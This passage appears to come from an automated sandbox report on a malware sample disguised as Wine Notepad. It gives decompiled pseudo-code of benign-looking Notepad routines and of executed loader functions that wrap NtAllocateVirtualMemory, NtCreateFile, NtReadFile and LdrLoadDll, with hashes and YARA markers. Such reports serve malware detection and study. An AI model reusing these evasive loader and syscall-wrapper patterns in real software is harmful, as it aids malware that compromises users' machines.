				intOrPtr _v64;
				intOrPtr _v68;
				struct tagPD _v72;
				intOrPtr _t22;

				E010A66E0( &_v72, 0, 0x42);
				_v68 =  *0x10c3f24;
				_v64 =  *0x10c510c;
				_v60 =  *0x10c5110;
				_v38 =  *0x10c3f20;
				_v40 = 1;
				_v72 = 0x42;
				_v52 = 0x40;
				PrintDlgW( &_v72);
				 *0x10c510c = _v64;
				_t22 = _v60;
				 *0x10c5110 = _t22;
				return _t22;
			}











                                                  0x010a200e
                                                  0x010a2018
                                                  0x010a2020
                                                  0x010a2028
                                                  0x010a2030
                                                  0x010a203b
                                                  0x010a2043
                                                  0x010a204a
                                                  0x010a2051
                                                  0x010a205a
                                                  0x010a205f
                                                  0x010a2062
                                                  0x010a206a

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Print_memset
                                                  • String ID: @$B
                                                  • API String ID: 2425697088-3873543624
                                                  • Opcode ID: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction ID: ff1438fdd0d050c47bbb1b1408779daa2084e229ac3f0463d6330bf6720396ef
                                                  • Opcode Fuzzy Hash: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction Fuzzy Hash: BF01C9B8E102089FCB50CF98E985B8DB7F4FB4C300F404126E988E7344E77AA9058F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2580 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2580() {
				short _v516;
				void* _t3;

				_t3 = LoadImageW( *0x10c3f20, 0x300, 1, 0x30, 0x30, 0x8000);
				LoadStringW( *0x10c3f20, 0x170,  &_v516, 0);
				return ShellAboutW( *0x10c3f24,  &_v516, L"Wine Notepad", _t3);
			}





                                                  0x010a25a0
                                                  0x010a25bc
                                                  0x010a25df

                                                  APIs
                                                  • LoadImageW.USER32 ref: 010A25A0
                                                  • LoadStringW.USER32(00000170,?,00000000), ref: 010A25BC
                                                  • ShellAboutW.SHELL32(?,Wine Notepad,00000000), ref: 010A25D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Load$AboutImageShellString
                                                  • String ID: Wine Notepad
                                                  • API String ID: 2733739231-3086428749
                                                  • Opcode ID: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction ID: b212f807f021e25f2be132c610dfb7e1d325a0875a9e818b18c112560ed9d484
                                                  • Opcode Fuzzy Hash: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction Fuzzy Hash: 97F03033151215BBF7315790ED8AFEA7A7CF708B10F000051B698690D4D6A729148B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A8069 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 33%
                                                  			E010A8069(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t5;

				_v8 = _v8 & 0x00000000;
				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
				if(_t5 == 0) {
					L3:
					return 0;
				} else {
					_push(0);
					_push( &_v8);
					if( *_t5() != 0x7a) {
						goto L3;
					} else {
						return 1;
					}
				}
			}





                                                  0x010a806d
                                                  0x010a8082
                                                  0x010a808a
                                                  0x010a809e
                                                  0x010a80a1
                                                  0x010a808c
                                                  0x010a808c
                                                  0x010a8091
                                                  0x010a8097
                                                  0x00000000
                                                  0x010a8099
                                                  0x010a809d
                                                  0x010a809d
                                                  0x010a8097

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 010A807B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 010A8082
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCurrentPackageId$kernel32.dll
                                                  • API String ID: 1646373207-142416881
                                                  • Opcode ID: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction ID: cc3f773d983011958fed7e35ce9bd8c2ddb3a76e4604934d31fbaee96844d6fa
                                                  • Opcode Fuzzy Hash: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction Fuzzy Hash: 4FE0EC316A030477EB64ABF19E8AB9B769C970164AF504968F282E1081DAF9D6008764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AFAAD Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010AFAAD(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E010A9233( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E010AF98A( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t28 = _v20 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E010A6117();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0x48b1fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0x48b1fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0x48b1fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0x48b1fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                  0x010afab5
                                                  0x010afaba
                                                  0x010afad4
                                                  0x00000000
                                                  0x010afad4
                                                  0x010afabc
                                                  0x010afac1
                                                  0x00000000
                                                  0x00000000
                                                  0x010afac6
                                                  0x010afae1
                                                  0x010afae6
                                                  0x010afae9
                                                  0x010afaf0
                                                  0x010afb0f
                                                  0x010afb16
                                                  0x010afb18
                                                  0x010afb5c
                                                  0x010afb64
                                                  0x010afb70
                                                  0x010afb73
                                                  0x010afb79
                                                  0x010afb7b
                                                  0x010afb8b
                                                  0x010afb8b
                                                  0x010afb8f
                                                  0x010afb91
                                                  0x010afb94
                                                  0x010afb94
                                                  0x010afb94
                                                  0x010afb94
                                                  0x00000000
                                                  0x010afb9a
                                                  0x010afb7d
                                                  0x010afb7d
                                                  0x010afb82
                                                  0x010afb82
                                                  0x010afb85
                                                  0x00000000
                                                  0x010afb85
                                                  0x010afb1a
                                                  0x010afb1d
                                                  0x010afb21
                                                  0x010afb4a
                                                  0x010afb4a
                                                  0x010afb4a
                                                  0x010afb4d
                                                  0x010afb4d
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb4f
                                                  0x010afb53
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb55
                                                  0x010afb55
                                                  0x010afb55
                                                  0x00000000
                                                  0x010afb55
                                                  0x010afb23
                                                  0x010afb23
                                                  0x010afb26
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb2a
                                                  0x010afb34
                                                  0x010afb3a
                                                  0x010afb3d
                                                  0x010afb43
                                                  0x010afb46
                                                  0x010afb48
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010afb48
                                                  0x010afaf2
                                                  0x010afaf5
                                                  0x010afaf7
                                                  0x010afafc
                                                  0x010afafc
                                                  0x010afb01
                                                  0x00000000
                                                  0x010afb01
                                                  0x010afac8
                                                  0x010afacd
                                                  0x010afad1
                                                  0x010afad1
                                                  0x00000000

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010AFAE1
                                                  • __isleadbyte_l.LIBCMT ref: 010AFB0F
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,048B1FE1,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB3D
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB73
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction ID: b49655052fe9c2941dbecb5d08ad187e3ec53c803f59393c59de2416dba0f359
                                                  • Opcode Fuzzy Hash: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
                                                  • Instruction Fuzzy Hash: 2731C131600247EFEB218EB8C894BAE7FF9FF45360F558568E5A59B191D730E850CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1810 Relevance: 6.0, APIs: 4, Instructions: 50stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E010A1810(struct HDC__* __ecx, RECT* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				int _t16;
				WCHAR* _t23;
				RECT* _t25;
				RECT* _t26;
				struct HDC__* _t27;
				int _t29;

				_t25 = __edx;
				_t23 = _a12;
				_t27 = __ecx;
				_t26 = __edx;
				_v8 = __ecx;
				GetTextExtentPoint32W(_t27, _t23, lstrlenW(_t23),  &_v16);
				if(_a4 != 0) {
					if(_a8 == 0) {
						_t29 = _t26->bottom - _v16.cy;
					} else {
						_t29 = _t26->top;
					}
					_t16 = lstrlenW(_t23);
					asm("cdq");
					ExtTextOutW(_v8, _t26->right - _v16.cx + _t26->left - _t25 >> 1, _t29, 4, _t26, _t23, _t16, 0);
				}
				return 1;
			}











                                                  0x010a1810
                                                  0x010a1817
                                                  0x010a1820
                                                  0x010a1823
                                                  0x010a1825
                                                  0x010a1831
                                                  0x010a183b
                                                  0x010a1841
                                                  0x010a184b
                                                  0x010a1843
                                                  0x010a1843
                                                  0x010a1843
                                                  0x010a1851
                                                  0x010a1862
                                                  0x010a186e
                                                  0x010a186e
                                                  0x010a187f

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?), ref: 010A1828
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1831
                                                  • lstrlenW.KERNEL32(?,00000000,?,?,00000000), ref: 010A1851
                                                  • ExtTextOutW.GDI32(?,00000000,00000000,00000004,?,?,00000000), ref: 010A186E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Textlstrlen$ExtentPoint32
                                                  • String ID:
                                                  • API String ID: 2058588642-0
                                                  • Opcode ID: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction ID: 360c2803d978ae15fa74da46ae6a3cabf60c1f617d5ce8d8e611597d8887fc36
                                                  • Opcode Fuzzy Hash: 09a6487e9bdddacc0f03d78b5392d09b9b48bde00e051175bd5cae20706e7a80
                                                  • Instruction Fuzzy Hash: 3B015E72900114BFE7109E9CDD88FEEBBBCEB49310F448155FA58E3144C735A950CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Function 0041E7CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                                  C-Code - Quality: 100%
                                                  			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;

				_t10 = _v0;
				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}





                                                  0x0041e7d6
                                                  0x0041e7ea
                                                  0x0041e80c
                                                  0x0041e810

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: ($
                                                  • API String ID: 2167126740-1917586925
                                                  • Opcode ID: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                  • Instruction ID: 75c01ba8265e86b6e799f606f6827c4ef4659bfb27b3c208fb82fe6623ca5877
                                                  • Opcode Fuzzy Hash: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                  • Instruction Fuzzy Hash: 63F015B6210208BBCB14DF89DC81EEB77ADAF88754F118159BE08A7241C630FD11CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E5ED Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                                  C-Code - Quality: 60%
                                                  			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t35;
				intOrPtr* _t36;

				asm("out 0x1e, eax");
				 *__edx = __ecx;
				if(__eflags > 0) {
					asm("in al, dx");
					_t23 = _a8;
					_t3 = _t23 + 0xa68; // 0xa90
					_t36 = _t3;
					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
				} else {
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0x14));
					_t11 = __eax + 0xa6c; // 0xa6c
					__esi = _t11;
					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
					__edx = _a48;
					__eax = _a44;
					__ecx = _a40;
					__edx = _a36;
					__eax = _a32;
					__ecx = _a28;
					__edx = _a24;
					__eax = _a20;
					__ecx = _a16;
					__edx = _a12;
					__eax = _a8;
					__ecx =  *__esi;
					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                  0x0041e5ed
                                                  0x0041e5ef
                                                  0x0041e5f1
                                                  0x0041e5b5
                                                  0x0041e5b6
                                                  0x0041e5c2
                                                  0x0041e5c2
                                                  0x0041e5ca
                                                  0x0041e5ec
                                                  0x0041e5f3
                                                  0x0041e5f4
                                                  0x0041e5f6
                                                  0x0041e5f9
                                                  0x0041e602
                                                  0x0041e602
                                                  0x0041e60a
                                                  0x0041e60f
                                                  0x0041e612
                                                  0x0041e615
                                                  0x0041e61c
                                                  0x0041e620
                                                  0x0041e624
                                                  0x0041e628
                                                  0x0041e62c
                                                  0x0041e630
                                                  0x0041e634
                                                  0x0041e638
                                                  0x0041e63c
                                                  0x0041e640
                                                  0x0041e642
                                                  0x0041e643
                                                  0x0041e644
                                                  0x0041e644

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                  • Instruction ID: bf58b033f4df4117e7473d6230dd595e805d3fddb0b0a0f6bc399e62227eb295
                                                  • Opcode Fuzzy Hash: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                  • Instruction Fuzzy Hash: C71112B2604208BFCB08DF98DC85EEB37ADEF8C754F048258BA0C97241D631E951CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040CF23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                                  C-Code - Quality: 100%
                                                  			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E00420F13( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421433(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004216B3( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F7B3(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                  0x0040cf2c
                                                  0x0040cf3f
                                                  0x0040cf42
                                                  0x0040cf47
                                                  0x0040cf4c
                                                  0x0040cf56
                                                  0x0040cf5b
                                                  0x0040cf5e
                                                  0x0040cf60
                                                  0x0040cf68
                                                  0x0040cf6d
                                                  0x0040cf6d
                                                  0x0040cf74
                                                  0x0040cf7c
                                                  0x0040cf7f
                                                  0x0040cf81
                                                  0x0040cf95
                                                  0x00000000
                                                  0x0040cf97
                                                  0x0040cf9d
                                                  0x0040cf51
                                                  0x0040cf51
                                                  0x0040cf51

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                  • Instruction ID: 5e04f6221a37e6357fdc510ce1da2c9258563d4a4a23712c115eaecd70357e5d
                                                  • Opcode Fuzzy Hash: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                  • Instruction Fuzzy Hash: D30152B1E4010EABDF10DBA1DD82F9EB3789B54308F0042A6E908A7280F634EB448B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E69D Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                                  APIs
                                                  • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                  • Instruction ID: afefd89c63c408e271d207366b207e4e6e1d150e5249734bbce09756756f7a8e
                                                  • Opcode Fuzzy Hash: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                  • Instruction Fuzzy Hash: 2FF014B6200208AFCB04DF9ACC84EEB77A9EF8C754F118258BE0D97240D630E941CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E5F3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                  0x0041e602
                                                  0x0041e60a
                                                  0x0041e640
                                                  0x0041e644

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_oaqcoreqiw.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                  • Instruction ID: 896d7442baf9be4756d905739e1f90aa296932759f722aab2a73c44ca3a6dc04
                                                  • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                  • Instruction Fuzzy Hash: D3F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E6A3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                                  C-Code - Quality: 37%
                                                  			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
